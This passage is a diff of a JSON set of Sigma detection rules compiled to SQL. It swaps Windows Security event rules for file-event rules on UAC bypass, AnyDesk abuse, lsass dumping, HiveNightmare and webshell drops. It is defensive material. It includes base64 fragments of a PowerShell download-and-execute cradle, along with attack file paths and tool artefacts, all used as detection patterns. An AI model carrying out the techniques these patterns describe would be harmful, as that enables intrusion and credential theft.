LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ServiceFileName LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.@%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "win_security_cobaltstrike_service_installs.yml" + "filename": "file_event_win_uac_bypass_consent_comctl32.yml" }, { - "title": "AD Privileged Users or Groups Reconnaissance", - "id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", + "title": "Suspicious Binary Writes Via AnyDesk", + "id": "2d367498-5112-4ae5-a06a-96e7bc33a211", "status": "experimental", - "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", - "author": "Samir Bousseaden", + "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "If source account name is not an admin then its super suspicious" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4661' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\')) AND ((ObjectName LIKE '%-512' ESCAPE '\\' OR ObjectName LIKE '%-502' ESCAPE '\\' OR ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-505' ESCAPE '\\' OR ObjectName LIKE '%-519' ESCAPE '\\' OR ObjectName LIKE '%-520' ESCAPE '\\' OR ObjectName LIKE '%-544' ESCAPE '\\' OR ObjectName LIKE '%-551' ESCAPE '\\' OR ObjectName LIKE '%-555' ESCAPE '\\') OR ObjectName LIKE '%admin%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\anydesk.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\\\gcapi.dll' ESCAPE '\\')))" ], - "filename": "win_security_account_discovery.yml" + "filename": "file_event_win_anydesk_writing_susp_binaries.yml" }, { - "title": "PowerShell Scripts Installed as Services - Security", - "id": "2a926e6a-4b81-4011-8a96-e36cc8c04302", + "title": "Anydesk Temporary Artefact", + "id": "0b9ad457-2554-44c1-82c2-d56a99c42377", "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%powershell%' ESCAPE '\\' OR ServiceFileName LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\AnyDesk\\\\user.conf%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\AnyDesk\\\\system.conf%' ESCAPE '\\') AND TargetFilename LIKE '%.temp' ESCAPE '\\')" ], - "filename": "win_security_powershell_script_installed_as_service.yml" + "filename": "file_event_win_anydesk_artefact.yml" }, { - "title": "Hidden Local User Creation", - "id": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "title": "Dumpert Process Dumper Default File", + "id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", "status": "test", - "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND TargetUserName LIKE '%$' ESCAPE '\\')" + "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\dumpert.dmp' ESCAPE '\\'" ], - "filename": "win_security_hidden_user_creation.yml" + "filename": "file_event_win_hktl_dumpert.yml" }, { - "title": "Possible Impacket SecretDump Remote Activity", - "id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", - "status": "experimental", - "description": "Detect AD credential dumping using impacket secretdump HKTL", - "author": "Samir Bousseaden, wagga", + "title": "Potential DCOM InternetExplorer.Application DLL Hijack", + "id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", + "status": "test", + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.003" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\ADMIN$' ESCAPE '\\' AND RelativeTargetName LIKE '%SYSTEM32\\\\%' ESCAPE '\\' AND RelativeTargetName LIKE '%.tmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName = 'System' AND TargetFilename LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" ], - "filename": "win_security_impacket_secretdump.yml" + "filename": "file_event_win_dcom_iertutil_dll_hijack.yml" }, { - "title": "T1047 Wmiprvse Wbemcomn DLL Hijack", - "id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", + "title": "UAC Bypass Using IEInstal - File", + "id": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\IEInstal.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%consent.exe' ESCAPE '\\')" ], - "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "file_event_win_uac_bypass_ieinstal.yml" }, { - "title": "Security Event Log Cleared", - "id": "a122ac13-daf8-4175-83a2-72c387be339d", - "status": "test", - "description": "Checks for event id 1102 which indicates the security event log was cleared.", - "author": "Saw Winn Naung", + "title": "SCR File Write Event", + "id": "c048f047-7e2a-4888-b302-55f509d4a91d", + "status": "experimental", + "description": "Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an \".SCR\" file using \"rundll32.exe desk.cpl,InstallScreenSaver\" for example.", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", "tags": [ - "attack.t1070.001" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate administrative activity" + "The installation of new screen savers by third party software" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.scr' ESCAPE '\\' AND NOT ((TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE ':\\\\WUDownloadCache\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_event_log_cleared.yml" + "filename": "file_event_win_new_src_file.yml" }, { - "title": "ISO Image Mount", - "id": "0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", + "title": "ISO File Created Within Temp Folders", + "id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", "status": "experimental", - "description": "Detects the mount of ISO images on an endpoint", - "author": "Syed Hasan (@syedhasan009)", + "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", + "author": "@sam0x90", "tags": [ "attack.initial_access", "attack.t1566.001" ], "falsepositives": [ - "Software installation ISO files" + "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND ObjectServer = 'Security' AND ObjectType = 'File' AND ObjectName LIKE '\\\\Device\\\\CdRom%' ESCAPE '\\') AND NOT (ObjectName LIKE '\\\\Device\\\\CdRom0\\\\setup.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.zip\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\'))" ], - "filename": "win_security_iso_mount.yml" + "filename": "file_event_win_iso_file_mount.yml" }, { - "title": "Enabled User Right in AD to Control User Objects", - "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", - "status": "test", - "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", - "author": "@neu5ron", + "title": "Suspicious File Drop by Exchange", + "id": "6b269392-9eba-40b5-acb6-55c882b20ba6", + "status": "experimental", + "description": "Detects suspicious file type dropped by an Exchange component in IIS", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1098" + "attack.t1190", + "attack.initial_access", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4704' AND PrivilegeList LIKE '%SeEnableDelegationPrivilege%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" ], - "filename": "win_security_alert_active_directory_user_control.yml" + "filename": "file_event_win_exchange_webshell_drop_suspicious.yml" }, { - "title": "RDP Login from Localhost", - "id": "51e33403-2a37-4d66-a574-1fda1782cc31", + "title": "Suspicious VHD Image Download From Browser", + "id": "8468111a-ef07-4654-903b-b863a80bbc95", "status": "test", - "description": "RDP login with localhost source address may be a tunnelled login", - "author": "Thomas Patzke", + "description": "Detects creation of \".vhd\"/\".vhdx\" files by browser processes.\nMalware can use mountable Virtual Hard Disk \".vhd\" files to encapsulate payloads and evade security controls.\n", + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", "tags": [ - "attack.lateral_movement", - "car.2013-07-002", - "attack.t1021.001" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Unknown" + "Legitimate downloads of \".vhd\" files would also trigger this" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND IpAddress IN ('::1', '127.0.0.1'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\') AND TargetFilename LIKE '%.vhd%' ESCAPE '\\')" ], - "filename": "win_security_rdp_localhost_login.yml" + "filename": "file_event_win_mal_vhd_download.yml" }, { - "title": "Suspicious Computer Account Name Change CVE-2021-42287", - "id": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", - "status": "test", - "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", - "author": "Florian Roth (Nextron Systems)", + "title": "Creation of an WerFault.exe in Unusual Folder", + "id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", + "status": "experimental", + "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", + "author": "frack113", + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.001" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4781' AND OldTargetUserName LIKE '%$%' ESCAPE '\\') AND NOT (NewTargetUserName LIKE '%$%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wer.dll' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml" + "filename": "file_event_win_werfault_dll_hijacking.yml" }, { - "title": "SysKey Registry Keys Access", - "id": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", + "title": "Typical HiveNightmare SAM File Export", + "id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", "status": "test", - "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects files written by the different tools that exploit HiveNightmare", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1012" + "attack.credential_access", + "attack.t1552.001", + "cve.2021.36934" ], "falsepositives": [ - "Unknown" + "Files that accidentally contain these strings" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ObjectType = 'key' AND (ObjectName LIKE '%lsa\\\\JD' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\GBG' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Skew1' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Data' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2021-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2022-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2023-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-haxx%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Sam.save%' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\windows\\\\temp\\\\sam' ESCAPE '\\')" ], - "filename": "win_security_syskey_registry_access.yml" + "filename": "file_event_win_hktl_hivenightmare_file_exports.yml" }, { - "title": "User Added to Local Administrators", - "id": "c265cf08-3f99-46c1-8d59-328247057d57", - "status": "stable", - "description": "This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Startup Folder Persistence", + "id": "28208707-fe31-437f-9a7f-4b1108b94d2e", + "status": "experimental", + "description": "Detects when a file with a suspicious extension is created in the startup folder", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1078", "attack.persistence", - "attack.t1098" + "attack.t1547.001" ], "falsepositives": [ - "Legitimate administrative activity" + "Rare legitimate usage of some of the extensions mentioned in the rule" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4732' AND (TargetUserName LIKE 'Administr%' ESCAPE '\\' OR TargetSid = 'S-1-5-32-544')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.jar' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\'))" ], - "filename": "win_security_user_added_to_local_administrators.yml" + "filename": "file_event_win_susp_startup_folder_persistence.yml" }, { - "title": "Suspicious Outbound Kerberos Connection - Security", - "id": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", - "status": "test", - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "author": "Ilyas Ochkov, oscd.community", + "title": "UAC Bypass Using IDiagnostic Profile - File", + "id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", + "status": "experimental", + "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1558.003" + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Web Browsers" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND DestPort = '88') AND NOT (((Application LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')" ], - "filename": "win_security_susp_outbound_kerberos_connection.yml" + "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml" }, { - "title": "Register new Logon Process by Rubeus", - "id": "12e6d621-194f-4f59-90cc-1959e21e69f7", - "status": "test", - "description": "Detects potential use of Rubeus via registered new trusted logon process", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "title": "Malicious DLL File Dropped in the Teams or OneDrive Folder", + "id": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "status": "experimental", + "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", + "author": "frack113", "tags": [ - "attack.lateral_movement", + "attack.persistence", "attack.privilege_escalation", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4611' AND LogonProcessName = 'User32LogonProcesss')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%iphlpapi.dll%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft%' ESCAPE '\\')" ], - "filename": "win_security_register_new_logon_process_by_rubeus.yml" + "filename": "file_event_win_iphlpapi_dll_sideloading.yml" }, { - "title": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", - "id": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", - "status": "test", - "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", - "author": "Orlinum , BlueDefenZer", + "title": "Legitimate Application Dropped Script", + "id": "7d604714-e071-49ff-8726-edeb95a70679", + "status": "experimental", + "description": "Detects programs on a Windows system that should not write scripts to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.privilege_escalation", - "attack.credential_access" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Administrator activity", - "Proxy SSL certificate with subject modification", - "Smart card enrollement" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND (TemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR TemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND (NewTemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.scf' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\' OR TargetFilename LIKE '%.wsh' ESCAPE '\\'))" ], - "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" + "filename": "file_event_win_legitimate_app_dropping_script.yml" }, { - "title": "ETW Logging Disabled In .NET Processes - Registry", - "id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "title": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", + "id": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", "status": "test", - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.execution", + "attack.privilege_escalation", + "attack.resource_development", + "attack.t1587", + "cve.2021.1675" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework' ESCAPE '\\' AND ObjectValueName = 'ETWEnabled' AND NewValue = '0') OR (EventID = '4657' AND ObjectName LIKE '%\\\\Environment%' ESCAPE '\\' AND (ObjectValueName LIKE 'COMPlus\\_ETWEnabled' ESCAPE '\\' OR ObjectValueName LIKE 'COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue = '0')))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\old\\\\1\\\\123%' ESCAPE '\\'" ], - "filename": "win_security_dot_net_etw_tamper.yml" + "filename": "file_event_win_cve_2021_1675_printspooler.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - Security", - "id": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Potential Winnti Dropper Activity", + "id": "130c9e58-28ac-4f83-8574-0a4cc913b97e", + "status": "test", + "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", + "author": "Alexander Rausch", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%set%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND (ServiceFileName LIKE '%environment%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%${input)%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\gthread-3.6.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sigcmm-2.4.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml" + "filename": "file_event_win_redmimicry_winnti_filedrop.yml" }, { - "title": "Reconnaissance Activity", - "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", + "title": "ISO or Image Mount Indicator in Recent Files", + "id": "4358e5a5-7542-4dcb-b9f3-87667371839b", "status": "test", - "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", - "author": "Florian 